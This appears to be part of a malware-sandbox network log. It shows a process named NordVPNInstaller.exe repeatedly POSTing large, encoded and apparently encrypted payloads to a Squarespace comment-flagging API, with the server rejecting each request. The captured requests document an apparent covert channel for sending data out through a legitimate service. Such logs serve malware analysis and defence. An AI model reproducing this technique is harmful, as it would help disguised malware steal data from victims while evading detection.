2024-09-01 19:56:17 UTC	16306	OUT	Data Raw: 64 38 68 36 4e 61 77 35 76 58 55 6c 33 71 4e 5a 34 4b 46 49 36 6f 38 74 64 38 64 44 37 71 4a 69 6e 42 33 54 74 66 38 41 4c 64 37 47 38 74 56 34 50 25 32 42 6c 34 57 5a 64 6d 34 56 38 71 52 41 46 42 37 71 6b 38 37 78 34 55 52 58 7a 37 78 54 67 55 4f 32 71 71 64 71 78 25 32 42 4b 68 31 55 50 77 51 63 4f 4e 45 71 34 4c 7a 6c 68 4c 34 77 47 79 44 55 6c 55 66 63 4e 69 4c 4e 38 75 33 4a 44 75 61 75 56 61 68 6a 65 63 32 55 62 4d 6e 77 48 25 32 42 4d 32 77 59 35 52 49 79 52 51 78 45 4f 71 6b 49 64 43 32 59 66 58 6d 70 67 6b 52 78 2f 39 38 68 2f 49 4c 7a 6a 30 53 66 48 32 6d 6c 67 25 32 42 54 74 41 54 4d 6e 59 2f 72 64 63 2f 45 73 41 49 6c 52 35 32 6e 69 7a 73 50 48 6a 76 6a 61 36 6a 34 25 32 42 6d 72 50 57 63 4e 51 43 66 62 6c 4c 56 78 49 46 4b 51 39 34 36 58 64 Data Ascii: d8h6Naw5vXUl3qNZ4KFI6o8td8dD7qJinB3Ttf8ALd7G8tV4P%2Bl4WZdm4V8qRAFB7qk87x4URXz7xTgUO2qqdqx%2BKh1UPwQcONEq4LzlhL4wGyDUlUfcNiLN8u3JDuauVahjec2UbMnwH%2BM2wY5RIyRQxEOqkIdC2YfXmpgkRx/98h/ILzj0SfH2mlg%2BTtATMnY/rdc/EsAIlR52nizsPHjvja6j4%2BmrPWcNQCfblLVxIFKQ946Xd
2024-09-01 19:56:17 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:17 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BfsEW_WRURVTN2UxMTE2MDUxNjhhZTcxYjg1NDdlYmNjN2FmYWJi; Path=/; Secure Set-Cookie: crumb=BZ2KwBM4jss_MmJhYzUzMGMyODkzMGZiNDE5MWExZDMzZmRjMDhl; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: iLM97M1S/KZRnUE8T Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZ2KwBM4jss_MmJhYzUzMGMyODkzMGZiNDE5MWExZDMzZmRjMDhl"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49763	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:17 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:56:17 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:17 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:17 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 70 6d 41 6e 58 6b 50 71 4e 77 6c 31 47 48 53 46 4a 47 36 4c 45 5a 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjpmAnXkPqNwl1GHSFJG6LEZIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:56:17 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:17 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BfSoFlX7UZiVYjZkMmMyYWZhNzc0ZTczNjNiNjcxYTk5ZTVlNjJi; Path=/; Secure Set-Cookie: crumb=BQDxS04oDXwPYzg1ZDBlMzhiMDViMmMxZDY3MjIxNzUxYWJiNjlj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: PuAvggm7/ER90a8tB Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQDxS04oDXwPYzg1ZDBlMzhiMDViMmMxZDY3MjIxNzUxYWJiNjlj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49764	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:18 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108904 Expect: 100-continue
2024-09-01 19:56:18 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:18 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:18 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 77 77 46 43 50 34 53 37 70 64 63 48 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YwwFCP4S7pdcHbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:18 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:18 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:18 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:56:18 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:56:18 UTC	1	OUT	Data Raw: 46 Data Ascii: F
2024-09-01 19:56:18 UTC	16306	OUT	Data Raw: 33 69 4e 4a 65 51 54 77 6e 58 43 44 32 4e 68 44 73 52 4b 77 6c 25 32 42 50 6a 79 63 59 33 25 32 42 76 48 49 69 71 32 44 72 4a 4a 34 2f 56 43 43 62 55 67 63 61 47 73 76 62 44 4e 33 49 5a 4f 55 31 2f 73 2f 66 30 73 74 33 69 54 75 6c 78 45 34 6a 31 6b 30 42 76 54 34 4a 32 25 32 42 57 66 4a 72 38 79 41 58 4f 71 59 71 4c 78 6a 2f 31 63 38 61 6a 44 6f 65 44 37 66 30 41 50 6f 4a 42 38 69 55 75 34 47 4c 42 5a 49 79 75 25 32 42 72 6d 67 6c 35 37 51 64 6c 34 49 49 6c 63 53 52 38 44 55 55 57 45 6a 6a 6f 72 34 64 47 77 59 71 77 68 56 38 6b 78 38 79 6d 32 54 51 51 50 46 5a 77 66 4c 42 4f 43 67 2f 37 38 76 74 35 4d 6b 7a 78 78 65 6e 61 34 69 57 6b 37 31 55 6f 67 4b 62 6c 49 65 6a 38 51 75 76 72 30 58 58 25 32 42 7a 64 48 65 71 44 4e 44 76 65 36 73 70 70 76 36 48 55 6e Data Ascii: 3iNJeQTwnXCD2NhDsRKwl%2BPjycY3%2BvHIiq2DrJJ4/VCCbUgcaGsvbDN3IZOU1/s/f0st3iTulxE4j1k0BvT4J2%2BWfJr8yAXOqYqLxj/1c8ajDoeD7f0APoJB8iUu4GLBZIyu%2Brmgl57Qdl4IIlcSR8DUUWEjjor4dGwYqwhV8kx8ym2TQQPFZwfLBOCg/78vt5Mkzxxena4iWk71UogKblIej8Quvr0XX%2BzdHeqDNDve6sppv6HUn
2024-09-01 19:56:18 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 19:56:18 UTC	16306	OUT	Data Raw: 36 7a 57 4f 41 42 50 47 4e 42 6a 53 4a 77 67 32 44 66 6d 62 33 7a 4c 4e 47 73 49 62 57 7a 75 6a 4e 56 61 34 57 55 32 68 7a 66 5a 78 79 62 42 68 5a 39 37 31 70 44 4f 57 75 38 42 36 32 4d 4d 61 63 44 74 4d 63 39 74 33 4c 59 46 51 53 30 7a 2f 4c 2f 53 32 57 32 49 59 47 35 4e 62 59 76 56 6d 44 62 52 7a 4b 6a 57 36 37 55 52 73 48 64 77 79 72 71 25 32 42 34 4e 36 36 41 48 52 59 54 51 59 76 6d 44 30 25 32 42 31 47 45 55 71 75 4a 36 42 70 78 33 61 71 38 49 5a 55 62 58 58 4d 48 65 69 33 50 36 42 45 30 42 6f 6a 2f 4c 63 47 36 6b 78 4a 7a 79 4a 38 44 6c 69 4a 57 39 32 50 4b 4e 43 65 36 4a 6f 76 53 65 6f 4e 6b 35 65 61 55 30 25 32 42 34 74 79 4e 62 63 6e 47 4a 54 30 72 55 37 66 52 45 25 32 42 52 61 74 32 37 45 77 78 25 32 42 37 6d 4e 65 48 6f 6b 4d 78 49 6f 71 37 6e Data Ascii: 6zWOABPGNBjSJwg2Dfmb3zLNGsIbWzujNVa4WU2hzfZxybBhZ971pDOWu8B62MMacDtMc9t3LYFQS0z/L/S2W2IYG5NbYvVmDbRzKjW67URsHdwyrq%2B4N66AHRYTQYvmD0%2B1GEUquJ6Bpx3aq8IZUbXXMHei3P6BE0Boj/LcG6kxJzyJ8DliJW92PKNCe6JovSeoNk5eaU0%2B4tyNbcnGJT0rU7fRE%2BRat27Ewx%2B7mNeHokMxIoq7n
2024-09-01 19:56:18 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:18 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BesRL22XUm0_OGI3NzMwYWU3YWM5ZmJiNjM0NDFiOGI4ODFjNWVk; Path=/; Secure Set-Cookie: crumb=BY0yC7F9Id6BY2I0ZGUzMzRmYzdjYmQyNDFlNDIyNmZhZjI4YzY1; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: YCxGLfwH/FM6Pv4Ql Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BY0yC7F9Id6BY2I0ZGUzMzRmYzdjYmQyNDFlNDIyNmZhZjI4YzY1"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49765	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:18 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108350 Expect: 100-continue
2024-09-01 19:56:18 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:18 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:18 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 78 69 75 6f 6e 74 42 75 50 6f 34 6e 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YxiuontBuPo4nbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:18 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:18 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:18 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:56:18 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:56:18 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2024-09-01 19:56:18 UTC	16306	OUT	Data Raw: 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 7a 37 Data Ascii: PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwgz7
2024-09-01 19:56:18 UTC	1	OUT	Data Raw: 64 Data Ascii: d
2024-09-01 19:56:18 UTC	16306	OUT	Data Raw: 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 67 51 Data Ascii: UPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7ChgQ
2024-09-01 19:56:18 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:18 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BU5LLm5sAnssY2NkMmZmNDU1YjM4YzEzYzE4ODM5ZGYzZmUzODE3; Path=/; Secure Set-Cookie: crumb=BdLip8_6HO8EMTQwZTE5NzBlYmFjOWFjOWE5OTk5Y2E0MDdhYjJi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: KGrB01Xd/nFNTCK12 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BdLip8_6HO8EMTQwZTE5NzBlYmFjOWFjOWE5OTk5Y2E0MDdhYjJi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49766	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:19 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:56:19 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:19 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:19 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 54 50 68 32 58 61 57 74 69 4e 39 66 36 35 71 69 64 61 47 6a 6e 70 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjTPh2XaWtiN9f65qidaGjnpIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
